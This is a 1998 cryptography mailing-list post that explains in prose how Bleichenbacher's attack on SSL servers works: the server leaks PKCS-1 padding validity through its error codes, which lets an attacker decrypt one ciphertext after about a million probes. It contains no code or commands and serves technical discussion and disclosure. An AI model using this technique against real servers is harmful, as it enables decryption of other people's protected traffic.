[2882] in cryptography@c2.net mail archive
Re: Bleichenbacher's crack?
daemon@ATHENA.MIT.EDU (Anonymous)
Fri Jun 26 13:32:37 1998
Date: Fri, 26 Jun 1998 19:01:02 +0200
From: Anonymous <nobody@replay.com>
To: cryptography@c2.net
Bleichenbacher will be presenting his attack at Crypto 98 in August.
It is not a timing attack, but rather relies on the server leaking
information about the structure of a decrypted ciphertext. This is
of course a violation of standard cryptographic protocol design
principles, but is present in many SSL implementations.
The attack is based on sending fake RSA ciphertexts to an SSL server, and
determining from the error code returned by the server whether they
decrypted to a legal PKCS-1 formatted plaintext. Many SSL servers are
configured to return different errors depending on whether this is
true or not.
A PKCS-1 padded plaintext has a 0, a 2, n bytes of nonzero random padding,
a 0, and the payload, which in the case of SSL is a session key with
some version information. Some servers check the length of the payload
and the version data, some don't.
It does not take too many tries to find a random ciphertext which decrypts
to a plaintext which has this form.
Once this is done, Bleichenbacher makes additional probes based on this
initial ciphertext, learning whether modified versions also decrypt to
the PKCS-1 form. His idea for how to make use of this information
has not yet been published.
After about one million probes, he is able to recover the decryption
of a desired ciphertext (or, equivalently, the signature on a desired
message, but most servers do not use their decryption keys for signing).
Note that the attack does not recover the decryption key, but rather the
whole effort allows the decryption of one message. Most of the attack
would have to be done all over again to decrypt a different message.
